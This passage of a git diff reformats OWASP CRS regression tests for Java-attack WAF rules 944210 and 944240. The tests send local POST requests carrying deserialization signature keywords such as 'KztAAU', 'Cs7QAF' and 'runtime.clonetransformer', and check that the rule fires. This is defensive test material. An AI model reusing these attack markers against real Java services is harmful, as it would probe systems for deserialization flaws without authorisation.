"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-32 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; 
name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-33 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-34 + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-35 + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-38 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + 
-----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-49 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-50 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-51 + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: 
form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 17b6ea658..72414303e 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml 
@@ -1,1791 +1,1702 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944240.yaml" description: "Positive tests for rule 944240" +rule_id: 944240 tests: - - test_title: 944240-1 + - test_id: 1 desc: "Argument test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log_contains: "id \"944240\"" + - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 